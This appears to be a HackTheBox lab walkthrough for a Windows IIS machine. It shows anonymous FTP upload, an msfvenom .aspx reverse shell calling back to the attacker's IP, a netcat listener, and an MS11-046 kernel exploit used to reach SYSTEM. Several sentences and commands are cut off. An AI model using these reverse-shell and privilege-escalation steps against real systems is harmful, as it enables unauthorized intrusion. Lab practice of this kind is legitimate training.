|10.10.10.5||Windows||Easy||15 March 2017|
As with any machine on HackTheBox the first step is to run an nmap scan to find open ports and running services.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 kali@kali:~$ nmap -sC -sV 10.10.10.5 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 11:19 EDT Nmap scan report for 10.10.10.5 PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds
While nmap is running we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command
The nmap scan reveals there is an open FTP service running with
anonymous login enabled. nmap shows the directory listing for the
anonymous user. The files in this structure look like startpage for a Microsoft IIS web server.
Opening the host in the browser confirms what the FTP server shows. The page opens to an IIS start page.
Connecting to FTP
Using the built in Linux commands we can connect to the server.
cd into our working directory and connect by running the command
ftp 10.10.10.5. When asked for a username we can connect with the name
anonymous. The server then asks for an e-mail address as a password. This can be ignored and left empty.
Testing file upload
Now that we are connected we should test file upload. Open a new terminal session and
cd into our working directory again and create a new file with the command
touch test.txt. This creates an empty file with the name
Back on the terminal session we connected to the FTP server, upload the file to the server using the command
put test.txt. The server should respond with the file has been uploaded successfully.
Checking the FTP and Web server link
Once the file has been uploaded to the FTP server we can check if the FTP server is connected to the web server by going to
http://10.10.10.5/test.txt. If successful this should load a blank page instead of an error page. Signifying we have file upload.
Exploiting file upload
Now that we have established we have file upload capabilities we can exploit this to open a reverse shell.
Generating reverse shell payload (MSFVenom)
To establish a connection for our reverse shell we will use a
.aspx payload generated via MSFVenom using the command below, setting the
LPORT for our kali machine IP.
1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4455 -f aspx > shell.aspx
shell.aspx file generated we can now upload this file the same way as our
- Login with user
To receive the connection from the reverse shell we need to open a netcat listening session. Open a new terminal session and run the command
nc -nvlp 4455. Using the same port number used in the
Establish shell connection
With the payload uploaded via FTP and our listener open. We can establish our connection by navigating to
http://10.10.10.5/shell.aspx in a web browser.
After a few moments our netcat listener will show the output below.
1 2 3 4 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>
We now have shell access to the box as the
With shell access to the box we can now enumerate the system to find our path to Administrator access.
To find if there are any available kernel exploits for this build of windows we will upload and run
WatsonNet3.5AnyCPU.exefrom the GitHub repo
- Copy this file to our working directory
- IMPORTANT - on our ftp session set the mode to binary by running the command
- Upload the file with
- On our reverse shell session set our directory to the IIS document root with
- Run watston with
After a few moments we should see the output below. Watson has found several vulnerabilities for this build of windows and suggests available exploits.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 WatsonNet3.5AnyCPU.exe __ __ _ / / /\ \ \__ _| |_ ___ ___ _ __ \ \/ \/ / _` | __/ __|/ _ \| '_ \ \ /\ / (_| | |_\__ \ (_) | | | | \/ \/ \__,_|\__|___/\___/|_| |_| v0.1 Sherlock sucks... @_RastaMouse [*] OS Build number: 7600 [*] CPU Address Width: 32 [*] Process IntPtr Size: 4 [*] Using Windows path: C:\WINDOWS\System32 [*] Appears vulnerable to MS10-073 [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel. [>] Exploit: https://www.exploit-db.com/exploits/36327/ [>] Notes: None. [*] Appears vulnerable to MS10-092 [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb [>] Notes: None. [*] Appears vulnerable to MS11-046 [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges. [>] Exploit: https://www.exploit-db.com/exploits/40564/ [>] Notes: None. [*] Appears vulnerable to MS12-042 [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode. [>] Exploit: https://www.exploit-db.com/exploits/20861/ [>] Notes: None. [*] Appears vulnerable to MS13-005 [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation. [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb [>] Notes: None. [*] Finished. Found 5 vulns :)
- Download The exploit from the SecWiki GitHub Repo
ms11-046.exeto the working directory
- Make sure the FTP session is still in binary mode
- Upload with
- Run the exploit in our shell session by running
The exploit will run but will not show any output. To check if the exploit was successful, we can run the command
whoami. Which should reveal we are now running as
This box is now completed and the
root flags can be found in their respective